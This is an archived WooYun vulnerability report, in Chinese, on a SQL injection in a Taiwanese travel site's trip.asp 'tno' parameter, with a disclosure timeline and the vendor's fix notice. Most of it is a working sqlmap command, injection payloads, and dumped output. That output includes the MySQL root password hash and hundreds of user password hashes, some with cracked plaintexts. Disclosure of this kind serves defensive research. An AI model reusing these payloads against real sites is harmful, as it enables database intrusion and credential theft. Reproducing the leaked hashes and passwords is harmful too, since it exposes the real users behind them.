乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-10: 细节已通知厂商并且等待厂商处理中 2015-11-17: 厂商已经确认,细节仅向厂商公开 2015-11-27: 细节向核心白帽子及相关领域专家公开 2015-12-07: 细节向普通白帽子公开 2015-12-17: 细节向实习白帽子公开 2015-12-31: 厂商已经修复漏洞并主动公开,细节向公众公开
清境旅遊資訊網某處存在SQL注射漏洞(DBA權限/root密碼泄露/大量用戶密碼泄露)
地址:http://**.**.**.**/trip/trip.asp?tno=62
python sqlmap.py -u "http://**.**.**.**/trip/trip.asp?tno=62" -p tno--technique=BEU --random-agent --batch --current-user --is-dba --users --passwords --search -C pass
---Parameter: tno (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: tno=62 AND 1455=1455 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: tno=62 AND (SELECT 2825 FROM(SELECT COUNT(*),CONCAT(0x717a786271,(SELECT (ELT(2825=2825,1))),0x7170786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: Generic UNION query (NULL) - 26 columns Payload: tno=-3346 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a786271,0x6666596c5268686b4257,0x7170786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: MySQL 5.0current user: 'root@localhost'current user is DBA: Truedatabase management system users [1]:[*] 'root'@'%'database management system users password hashes:[*] root [1]: password hash: *8F5193A299A2DAF5042290B9A10E1284C8600CE0Database: test+-------+---------+| Table | Entries |+-------+---------+| a | 3 |+-------+---------+Database: cja+-------+---------+| Table | Entries |+-------+---------+| ad | 6 |+-------+---------+columns LIKE 'pass' were found in the following databases:Database: dbforhotelTable: login[1 column]+-----------+-------------+| Column | Type |+-----------+-------------+| lPassword | varchar(32) |+-----------+-------------+Database: dbforhotelTable: setting[1 column]+----------+------------+| Column | Type |+----------+------------+| sAskPass | varchar(1) |+----------+------------+Database: imagebooksTable: manger[1 column]+-----------+-------------+| Column | Type |+-----------+-------------+| passwords | varchar(20) |+-----------+-------------+Database: cjaTable: cjauser[1 column]+------------+-------------+| Column | Type |+------------+-------------+| cuPassword | varchar(32) |+------------+-------------+Database: dbTable: sys_user[1 column]+-------------+-------------+| Column | Type |+-------------+-------------+| surPassword | varchar(50) |+-------------+-------------+Database: userTable: login[1 column]+-----------+-------------+| Column | Type |+-----------+-------------+| lPassword | varchar(32) |+-----------+-------------+Database: userTable: setting[1 column]+----------+------------+| Column | Type |+----------+------------+| sAskPass | varchar(1) |+----------+------------+Database: mysqlTable: user[1 column]+----------+----------+| Column | Type |+----------+----------+| Password | char(41) |+----------+----------+Database: mysqlTable: servers[1 column]+----------+----------+| Column | Type |+----------+----------+| Password | char(64) |+----------+----------+Database: dbforhotelTable: login[21 entries]+-----------+| lPassword |+-----------+| + || + || + || + || + || + || + || + || + || + || + || + || + || + || + || + || + || + || + || + || + |+-----------+Database: dbforhotelTable: setting[1 entry]+----------+| sAskPass |+----------+| 1 |+----------+Database: imagebooksTable: manger[2 entries]+-----------+| passwords |+-----------+| 9393 || arch |+-----------+Database: cjaTable: cjauser[22 entries]+-----------------------------------------+| cuPassword |+-----------------------------------------+| 0d0fd7c6e093f7b804fa0150b875b868 || 0deb1c54814305ca9ad266f53bc82511 (413) || 1068c6e4c8051cfd4e9ea8072e3189e2 || 17d63b1625c816c22647a73e1482372b || 4187db82d9b3c103dc996029dd723f55 || 4f4adcbf8c6f66dcfc8a3282ac2bf10a || 5b69b9cb83065d403869739ae7f0995e (501) || 69cb3ea317a32c4e6143e665fdb20b14 (402) || 816b112c6105b3ebd537828a39af4818 || 8cb22bdd0b7ba1ab13d742e22eed8da2 (406) || a4fa8d76cc8d25e6e1ad5a772dd951a5 || a96b65a721e561e1e3de768ac819ffbb (409) || b337e84de8752b27eda3a12363109e80 (504) || b337e84de8752b27eda3a12363109e80 (504) || b337e84de8752b27eda3a12363109e80 (504) || b9228e0962a78b84f3d5d92f4faa000b || bbcbff5c1f1ded46c25d28119a85c6c2 || bbf94b34eb32268ada57a3be5062fe7d || d6194c68fcc7e79bb57401be603cb1cc (arch) || e8c0653fea13f91bf3c48159f7c24f78 || f4f6dce2f3a0f9dada0c2b5b66452017 || ff4d5fbbafdf976cfdc032e3bde78de5 (506) |+-----------------------------------------+Database: dbTable: sys_user[0 entries]+-------------+| surPassword |+-------------++-------------+Database: userTable: login[268 entries]+----------------------------------------------+| lPassword |+----------------------------------------------+| 009a2cb1bca0680ade76f99cf0f43359 || 00be3dbda5eaec57e207b57cdcedfb47 || 00feda47d7e1343a69615bc90b98615c || 01519e0b9ef69b7d1efc4f811050a9fd || 0364dccc14c12839c208a9e4b8172a2c || 038c1936dd7a2925029d760630cb7a2e || 03b1d0aec9a4b63565d998fc75c2b53a || 0448255f04404e9ae794cd073705bd1e || 04fa890e792fd9a26e2d4827c0080f64 || 0869cf46fd51daaf1ee9ad0a2d2dba6a (ingrid) || 0a1b155a18955b296570055080afb493 || 0a24c3e19f0b5f296b92bb590d2d3b98 || 0b8403849dfcb9fb671be4079ea44301 || 0d4ee82d91f12ae2e4f00a77510e5cbe || 0d54ea5793476a089330c69c3c492600 || 0dcf69b28cb77a0d1af027e2ee033776 || 0f28f045467b0d48df688ef80b2bdbe1 || 102f59d14de3b3c2439a029cf7365458 || 10c91836d0ec967f23ac4f3fdf537584 || 113180fa10fcf7a118ecdbcd21c4cd24 || 11513f0395b5a9f667eba7d3a4e78c87 || 12884181754cbf0dbb3584ba42730ed5 || 13a51a7d8b5d448004712800ca7ba194 || 1582bbda0d1168f570cdecc3bf2a5277 || 1675200c44369622e113989cf0b88eb1 || 16c6885f3b6013d96aaa9510ed954ee8 || 1702ea895ec4c5bba91770a68b873428 || 181b23679f5f42c79a74a063ffcc4024 || 19c615265241c83e601d181c29ba85a3 || 1ace5b8364407507910b324dcde3c894 || 1c208ee88299e7d6d6eff86e6879384e || 1cf4542159248840add6e42bbf0a36a4 || 1e05855b023dededf3edb94b408052b2 || 1e274228c5c32439cad84f967cb43ff8 || 217d3def9e43ec681a3fb63c4a4f96e2 || 2346b2b92b469bc6d9bd1153909f6506 || 23a306c84a8ad7859f02be041582b193 || 242cd53ed09e4c3aa8a8c8ebba8157c5 || 250b76af0b9e34cd12acfefaf512af6e (9746) || 25ddcec74d1e39aa1c1337144f1828d4 || 25f9e794323b453885f5181f1b624d0b (123456789) || 25f9e794323b453885f5181f1b624d0b (123456789) || 26cd8ecadce0d4efd6cc8a8725cbd1f8 (8850) || 275746fc9c2bb0d93fc6d5c97b858a75 || 27774ebf825a5688f090a43e53d09049 || 2868cd0c1cb042d504a0a6bdeace28cc || 287fc889941fc09b9d1990ed49503f43 || 2895e765d07fb44f64fde5b3aa1b87cc || 29381596cb8ba7752e1d8b01de048ceb || 2a5c88814e84a633d4213107490686c3 (0719) || 2b5bf2b774425226f26519d2e1593d08 || 2d71048e4dbd42b2b4978b48129a4288 || 2ee32d598c37689b8e1e2fecd5624376 || 2f7b52aacfbf6f44e13d27656ecb1f59 || 300f36d25fcc38a80315a57cb83081fd || 303640f09610c5431499d2fcd814c229 || 305c0967b1297eca1c29d058e6c89f03 || 31405671c55d5bff0279b234fe5d241c || 315339fddfa797cbdda13b93b54b6e52 || 339fc0de8c41796fa09d414c739143c5 || 3433ae01020bcca2d61ae59432ba1739 || 3433e795e7f81f6c60e8ef0b3f6f846a || 3439cfadbb1f7e8f8a2414b054345399 || 34adb34803a7dbc17587465820b3a111 || 34ca67a05cbc9d9446178fd278d06625 (585858) || 35461f509fb18bd26fa824137d334aee || 35ad3e7e401eb19d270ee656f34770e3 || 37ab04ec0b9cf2be507890d02c6d8b02 || 3af5d81e4a6e50258c1455abdfb6cd06 || 3b3cfe077f7437e1492bd8e37e5bb1f0 || 3bbe7117fa9a2ed2f3265e072ebf8b52 || 3df06f597b9d174afa8599548e535b8e || 4150d6a4725ff1484640c9d2e458a429 || 4187db82d9b3c103dc996029dd723f55 || 420a8aa33c2dfb1df5cde5679757264e || 4249b76316c0b5c4630c9ea435d01d38 || 4297f44b13955235245b2497399d7a93 (123123) || 434fa0f960cfef390270a185b5985282 || 44e45a4cb7cf666496bcd2183d9662b4 || 454822534bff14221be1d9dea999fb43 || 45bf417955f7852c626efac2c0f27b0a || 4671d65566923b89254addb3b614602d || 46f57c18dd40ccaaffb17103d16e6aa0 || 4798a43cdd8c54b704820a776e7cb326 || 48362ade17cd04b0d84467a405bf673a (a123321) || 490d240500d99a28095d2a3721a0d4a5 || 492470b9b083e5d89c5936bdee84f304 || 4a7d1ed414474e4033ac29ccb8653d9b (0000) || 4aed5e9fd2cacf9d17c3199a2554e7e2 || 4aee31b0ec9f7bb7885473d95961e9a6 || 4d5fcc495cd66c936ce57bc7a03d1d04 || 4e51f7c2e8c5ff0f44469e3f82e5e549 || 5072ec0261a35740089ed41e844e51eb (0116) || 5164474aa0d9bcf0f142a33a835f9400 || 51fbd31b0da181b173183fb3013bd52a || 5510668a4808817548965564f82d99fd || 57a166428dc15a54dbe19584ec88dfd4 || 58e32dedaa5ed5360eaa20b63fcc8602 || 5912d7bfd10f631f1715bf85bbb72d97 (genius) || 5a83df9b428796ad3902f05ae72d5910 || 5b7d9a44b8268ada5ce75af91e74186b || 5cd4076da2cfd26a06bcd015fc03cc81 || 5e82de16115a4a7d7f0b7d45ebd67481 || 5eb13cb69b6e20dd7a42030f5936a9dc (4141) || 5eba93870d07855ec55ffa72e726b9ed || 601a17fa8a2c225a128be6feb6e9b6fd || 611614c0475914484ae9c6030f9a83a2 || 64d7632ebb5bfbea6dbc91138c0fb97d || 65cf24929e1e75a076a1652537c49314 || 65cf24929e1e75a076a1652537c49314 || 66061e1c27617343b588290b2e14f8cd || 6691fc7e69b32d0879c93714a75e5e9c || 672b3b33624db72f94cd3fce0eff42ae || 685bd453c8814e37630476814db5b8c8 || 688ef071d72fb3211036b28a42bd2665 (868890) || 696fe28aea9b55b70b516ffa24905611 || 6993349110c45fdfb41a5d4ad6b3e90b || 6c5b89c0c2e4d784cb942370434589b5 || 6ced8a776ace417a6114af7636e4e62f || 6f4a97a92ddfbe8e84d79c8c99272583 || 71a7af9fa2438ddbdf48efc20c9907fe || 722dfecfd1aa972b8bc6b1b69bd7ab35 || 728febaebd6038e30a192befc66284a2 || 74212b7fdfd0329885256369001a3a37 || 776c3e88bd7e379297ab7cb35525b1de || 7852136456120515d26c4520147773e8 || 798760b8632fa4b1eed42e567a2a486e || 7a1b5d24b5900a79442f4ed8801e6692 || 7a51de0f9730f5fd6cf6f55ef81e6a8d || 7a54c743208b8225a1800a014caa7d1c || 7a6e033c942e803efd28c651c48e3812 || 7bc1ec1d9c3426357e69acd5bf320061 (2173) || 7c45995740b00862cadef1fccc00029a || 7cb5d30e9a0808c14691f556b3fdf8df || 7cf17bd25e975c746dea84308e3aad80 || 7d2e5882dd2cf185f79d26c953a0dc2e || 7d84f5291e70d50acce3f5a8e68eb015 || 7d8690e7c90ce297f91d531b2db27f28 || 7f54f42cf64cf1452b1149aa312abfa4 || 81dc9bdb52d04dc20036dbd8313ed055 (1234) || 826293f696594b986ec256f6faf922e5 || 82dab982fb01ce5a9e6abd13dd3a6643 || 837c7233ae668118b1540ee74c914924 || 83f9e9cfe7b556e001ad417d2f564d95 || 850d1ae6600ec13c04d3e4154d8bf3f7 || 86109d400f0ed29e840b47ed72777c84 (1345) || 86d84a422dadd01e48c96cc07dad5d42 || 87da4e8d71a37d89091fe02bf0f37b45 || 87eed799a2955dbddad1a9468dc86845 || 881f27c2c5c2735edc32525a975ab3e9 || 89fc98242b942895ea1ead5dd17cff09 || 8b35ee4dd1bc9f0f6b625cc244c5df72 || 8ea8f66405b67b744e715f1a8a56f478 || 8fc2449dfd43c0ae7a1be455384510cc (101899) || 908a7aa45bc75776f561d996cc24559e || 90ad3922d652e3d173340e0464c8a88e || 9191051bbc7d0ecda2783406bcb12778 || 91a92d2ed473c35322e56d769b1c9999 || 92088e7a77ccf73d39b0b4220e3e6d81 || 925c842568735e2c2ef592754d75652e || 92c3ae0cffae609cddaea7de8e8b5623 || 95b0bfd1501a65bdfa1dc71dba61c9c6 || 9800aa6dd63426e5155b76b184510f46 || 98110dd39d6e8fda7ea99e5c927932af || 98d6aa0e1e79787fbea68e24bc411dad || 9926e4ea65803b814bd721d910edf1e5 || 9a542ab529973cb8797e49121763bcee || 9b9ef309769410149765f4ba001d2396 || 9bc565b8841e4aef3ae27cec20fb9c0c || 9d0b2d24b1891b1cdbf46eae7033ce24 || 9e57e4ce19d5fdf62c98318c44f46e51 || 9f31d384c09d3c41b182ca0fe3402d11 || 9f9cfc306da6b52da8f9b7a1c2431079 || 9fc7c65f71e9f8db03b428133221c015 || a145a82ecb5bbe10a9551bc702f94674 || a2ecd3e30603e42283d8a1bd89a72d5a || a35473cf94d983e392c83b24d265f3c1 (0903) || a3e451b95c56bfb559ff46916f4f7b62 || a417506f46c069853567f365987caded || a530e7df91ba502bd8c916941b124a51 || a574772d83ca8cd22c25178fd74ba2cc || a7dd973b687a5de9c458cf2a46ad9202 || aa3d5da98a8b3cb04b72d02a5301bc21 || aa700b482229770e61764dfd004a9ace || abc17db885b963a3f08ccc8a3e8a64ef || ac28738bde349b8252e39016b57caf65 || ad1aee19f0d57b63d5870456804df1ee || ad6be5d50cd75b53ed69e7cb5a98bf40 || ad808dca31029ed6de2d69d2f3457827 || adef61f32ab894720b40336c1d665812 || ae56c4ee8aa8d0aaa347f6c6ee7e2118 || b056ca975ed8ec61f2ec684237551e87 || b0b87703bd9ac844523d1ce1bb586789 || b0e86e403ecda3d4d076070b34ccdcd0 || b16ff47cad642cf006d3f51bbf3e0930 || b1e37a4702703c25ee29f4edfe3162fc || b206e95a4384298962649e58dc7b39d4 (1314520) || b5413044ab67452daedf6ee2d87b9f09 || b55140f86a1264e563fd0fc6af2e9223 || b71d3077247ce1eef88aac0e295c2174 || b7e63e546fd6e89bdac7bc9fad42921f || b8f6c71d9e71fd2a1f0aafdda3cbaa10 || bcfc803d83cf8ce4253e8ea7953bbf63 || c168a2bc673be90e75392d921959237c (forget) || c1e2e6cd57970b7cf6b5fa7829a182e1 || c536b97a3e970a89cb6dd8442c53d0ca || c538f8c4f6b91786f31f2fe08e71ed05 || c737f8befdfbc3616cd14d8cc706c407 || c9a8b379f223e84003966c874be95ab7 || cd31a63c3bde9aa8ab5e08a6b3be1bf5 || cd349dcd8058abb8202e8d6d4104f22b || cd5607d9ca45f5f8be107f49e830302c || ce33ed99cfe9d2a80a14fd3bdec33986 || d0053710e48063097bfe6719953dab0e || d005ec5d125abb906d89852438b865bc || d02519e560d7cbba34156f3577221af5 || d05820e590398109daa9dd532e0e8591 || d09dbe4ee0a5cba6ad39faa50cdbae45 || d124d589f088840d5c8d0c5a59f8b4a9 || d279f5abf23428b8c5ec3abe6f908294 || d2fdf41879e22098ddf642d1c24dc42d || d54c4633efd46bb9d2b123712866c4d5 || d6bdb1b333a9a72e8e27ae28be1561a1 || d6c73748e0cf4f330533b8075d0fb359 (11291129) || d8e6eeb43351126b0d79d8f1ef47d541 || da5747496d061449d54c5cfa99ab8f8b || da575dc775d9d624168d33fec780ce27 || db8b873ce1e64086eadb629bc7f0e391 || dd4b21e9ef71e1291183a46b913ae6f2 (00000000) || ddba4c0c534e67200b9a1fa46f73383d || e07cea1eba0110d5d177671f0bedc501 || e10adc3949ba59abbe56e057f20f883e (123456) || e18d892343a5199bcdc78ab928aa4a3e (12201220) || e2fcd951094d581d859f7ae5b6574759 || e3bb38d9e4878be26d4119c440d190f0 || e43954e611fdce182ffc99af379706c6 || e4a406d8f1b4ac445e07a40c405b2233 || e56452e61eb9819e13d6dede611de446 || e5839e3d9b95274227b3a345f928d3c2 (amyamy) || e78d968a16cf027b320f376df4b7609c || e9e7b5bd8b3f3857734330111152983f || eaa2a7627a81936c701eeacf52ae2185 || eb33664e0f93d980d519d3d42ec96ed3 || eb5ba7c977d21014520ad3ee0432d10f (bonnie) || ecc69fa2a73db49e7260b3c95fc53a42 || eec4acceead728611c917ec2b7a4f250 || ef893ebd50204246f1fbc0ffa445c9e1 || f0898af949a373e72a4f6a34b4de9090 (7654321) || f0d7fbac0e8b160f7a55761cb8246c66 || f1f2df02c4d5fc86d3e8a389243e9f00 || f215c71cf56ae8a30ea8b0e6ea74256b || f2b657079f35078b8980844ae75dc782 || f2cabb3aa67f89143f45047f1bcc71ef || f52acd1383262ab45d13f44ad5ed1ec5 || f62862c61c52044e7e733947f2f29153 || f64c75e2837d4868f78ca419fef398d4 || f746510324676c3228b9e858d6861eaa || f7f57e9999dc0ba338f9cbcfa63f6d9e || f863061e816b47c14183a1e78743e60d || fa4e91a6b31e94b5f0ff21fb3afd6692 || fb0a0270cb33f8a6e54fd987ff2a9927 || fb11f20f89ac7ab2cab050c5fae0b9cc || fb7b1b1ae1520a4ad940386eef95488a || fba85b69b8fd1c3bc952daff33b50627 || fcea920f7412b5da7be0cf42b8c93759 (1234567) || fe014a7d04dca9a8ee115c60bd5c6173 || ff0fe8e645f272e3467fcb1c90948a0c || ff92a240d11b05ebd392348c35f781b2 |+----------------------------------------------+Database: userTable: setting[1 entry]+----------+| sAskPass |+----------+| 1 |+----------+Database: mysqlTable: user[5 entries]+-------------------------------------------+| Password |+-------------------------------------------+| *8F5193A299A2DAF5042290B9A10E1284C8600CE0 || *8F5193A299A2DAF5042290B9A10E1284C8600CE0 || *8F5193A299A2DAF5042290B9A10E1284C8600CE0 || *8F5193A299A2DAF5042290B9A10E1284C8600CE0 ||+-------------------------------------------+
上WAF。
危害等级:高
漏洞Rank:18
确认时间:2015-11-17 13:42
感謝通報
2015-12-31:已修復